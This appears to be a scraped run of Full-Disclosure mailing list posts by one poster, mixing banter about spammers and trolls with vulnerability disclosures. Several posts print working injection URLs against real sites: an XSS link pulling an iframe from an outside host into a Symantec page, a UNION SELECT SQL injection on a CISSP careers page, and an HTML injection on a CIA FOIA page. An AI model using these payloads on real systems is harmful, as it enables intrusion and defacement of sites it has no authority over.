On 2012/08/16, at 19:27, Jacqui Caren wrote:
IMHO Give the guy the benefit of the doubt - but it does not hurt to block
all incoming traffic for the uni
and report any ads instigated from dialups to the appropriate ISP pointing
out thet link to the assumed hacked
account of said
On 2012/08/16, at 12:49, valdis.kletni...@vt.edu wrote:
On Tue, 14 Aug 2012 14:55:41 +0900, Tonu Samuel said:
I found that person who is spamming
OpenCV list with Plz visit my e-gaming site at http://.; is PhD
So... did you establish that the person doing the spamming actually
Hi!
I hope this is within reasonable limits of self promoting. I keep blog about
local spammers but today bit different fish was captured. I found that person
who is spamming
OpenCV list with Plz visit my e-gaming site at http://.; is PhD and associate
professor of National University of
Really funny thread is going on in Postfix-Users list. Scroll down about half
of content here:
http://comments.gmane.org/gmane.mail.postfix.user/227441
Just good example how NOT to do.
Tonu
___
Full-Disclosure - We believe in it.
Charter:
On Thu, 2010-04-22 at 10:12 +0200, PsychoBilly wrote:
http://www.facebook.com/help/?page=174
What can I do if my group has been hacked?
Please note that is not technically possible to hack a Facebook group
http://www.facebook.com/help/?page=1011 is right URL.
Tõnu
he corresponding request in the access log was a good idea..
Here's one example:
221.204.*.* - - [30/Mar/2009:10:21:30 +0200] GET
/mtERuE0/osOAJo/3dK/tUekE2Ws.gif HTTP/1.1 404 293 - Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1)
Google for 221.204.x.x. You more weird things from
Hi!
Not an exploit or bug but just another sample of making things
difficult. Try to find out in HTML source where foobar comes from:
http://www.digg.ee/xsl2.html
Ignore other stuff on this host. Just happened to be logged in there
when idea came :)
Enjoy!
Tõnu
On Fri, 2008-12-05 at 12:52 -0500, Exibar wrote:
My prediction is that n3td3v will remain and torment us more with
his/their/its/her unwanted rubbish on this list and will never ever leave as
was once promissed
why am I feeding the troll? oh boy...
Only thing which might
Hi!
After endless reports and attempts to report over years to let 3ware
know about their SQL injection holes they still have all data
unprotected. Up to reader what to think about me or this company. I just
supply screenshot which I tried to report many times discretely:
On Mon, 2008-03-24 at 15:31 +, n3td3v wrote:
-- Forwarded message --
From: Markus Krassnitzer [EMAIL PROTECTED]
Date: Sat, Mar 22, 2008 at 1:28 PM
Subject: Re: Offensive Security Backtrack Training
To: [EMAIL PROTECTED]
I see postings like this in several mailing
On Fri, 2008-02-08 at 14:27 -0600, reepex wrote:
the default OS 1gb ram limit is very lame, and has made everyone I
know install another OS
Don't troll! This is irrelevant to this list. Not interested? Just
ignore but please do not troll.
Tõnu
On Tue, 2008-01-22 at 12:16 -0600, reepex wrote:
so mr prdelka - how can you act so blackhat when releasing
exploits?
Did you write these exploits yourself or did you pawn these off ilja
as usual?
This is full disclosure, so please do not complain. Does not matter
where he got it.
Ooh, I
On Tue, 2007-08-28 at 00:30 -0400, scott wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I remember a guy that set up a firewall box for his wireless AP that
flipped every page that an unauthorized user accessing his AP would
get.Really great stuff!
His neighbor was stealing his
Hi!
Reading today http://www.digg.com/offbeat_news/WTF_is_this_Character
rang bells in my head. There is a nice utf character which just confuses
software and all display goes instead left-to-right into right-to-left.
It is difficult to exaplain but go and read original.
But by concerns are
On Thu, 2007-08-16 at 22:19 +0200, Fabian Wenk wrote:
Hello Simon
Simon Smith wrote:
Greetings,
Does anyone know any more details about the current skype outage, other
than what is being presented on their web-site? It appears that all
I guess Problems with Skype login [1] does
http://www.clpwn.com/2007/08/13/breaking-news-team-clpwn-hackers-compromise-cnncom/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
http://www.symantec.com/en/id/smb/products/trialware.jsp?pcid=%22%3E%3C%
69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A//c99%2eclpwn%2eco%6D%2F%
68%6D%2E%68%74%6D%3Epvid=bewin_svr
Tõnu
___
Full-Disclosure - We believe in it.
Charter:
Just POC
http://evil.hackademix.net/fullscreen/js.html
Tõnu (unrelated to this web or exploit)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -
Unsure if this new here:
http://immike.net/blog/2007/08/06/single-line-of-html-crashes-ie-6/
Tõnu
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -
Long time ago someone posted here SQL injection on CISSP page. No
changes. I post slightly modified version to bug them again
http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10328199%20union%
20select%201,2,3,(select%20top%201%20name%20from%20sysobjects%20where%
On Sat, 2007-07-21 at 22:53 -0500, Todd Troxell wrote:
Noticing lots of admins tend to forget about /server-status, I typed at
random:
I am sure there are ten billion others. In some cases this is worse than
someone grabbing your access log.
The guy who took pictures of the stolen harry potter book and put them
on the net forgot to remove the EXIF data which contains the serial
number of his Canon camera which means he can be traced back.
On Sat, 2007-07-14 at 08:03 -0700, Aditya K Sood wrote:
Advisory : Phishing Vulnerability in Verisign Network
Dated : 5 July 2007
Severity : Critical
Sorry but Verisign plainly sucks. I found some problems in their system
when tried to get vertificates for web server. After I reported issue
http://www.foia.cia.gov/browse_docs_full.asp?title=foobar%3Cimg%
20style='position:absolute;top:10px;left:100px;'%20%
20src=http://hosto.ru/znako/ban-prost.gif%3E
BTW, f**k you who publish hashes. If you have nothing to publish, just
STFU.
___
Long time ago I made unneccesary noise about PHP zeroday. I expected it to be
maybe much more dangerous that it appeared to be at end. There was lot of
disscussions and one of main consensus was that this bug is not exploitable
in real world because noone is using those vulnerable functions.
On Wednesday 20 September 2006 16:51, Niall Smith wrote:
Hi Tonu
I saw you message posted at
http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/046460.html.
Responded in private.
Tõnu
___
Full-Disclosure - We believe in it.
Charter:
On Friday 18 August 2006 19:09, [EMAIL PROTECTED] wrote:
I believe the attack to which you're referring is known as Van Eck
phreaking; it was discovered in the mid-80's. TEMPEST is a USG standard
for limiting/eliminating EMR emanations and was declassified in the
mid-90's (which you
On Monday 14 August 2006 09:23, Antoine SANTO wrote:
http://www.cs.ucl.ac.uk/staff/M.Handley/papers/fragmentation.pdf
Have seen it before but cannot make code work. Had no time to rewrite or make
it work. Anyone else?
Tõnu
___
Full-Disclosure - We
Hi all bad guys :P
I can't resist, FBI rocks!
http://no.spam.ee/~tonu/exif/?srcid=1847src=http://www.fbi.gov/wanted/seekinfo/erienote1.jpg
Tõnu
___
Full-Disclosure - We believe in it.
Charter:
Anybody knows working email contact for 3ware.com? I tried to write them few
times about serious security flaws but there is no response and no fix
either.
So if anybody know someone from 3Ware, let him write mail to me.
Tõnu
___
Full-Disclosure
Maybe year ago this EXIF thumbnails security topic already was discussed in
security lists. Mail problem to me was lack of real world examples or any
kind of statistics of this problem. People who published this problem did not
shared source code used. There was many technically problematic
On Friday 26 May 2006 13:49, r k wrote:
Hi All,
IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page.
the following is the code
My Firefox under linux died on it!
Tõnu
___
Full-Disclosure - We believe in it.
Charter:
I got Motorola E398 phone and was trying all known bluetooth exploits on it.
None of them worked (which is good of course). But meanwhile I got some ideas
and after some modifications to existing exploits I found a way to fool my
phone. This is not a very brilliant exploit, so I can post full
33 matches
Mail list logo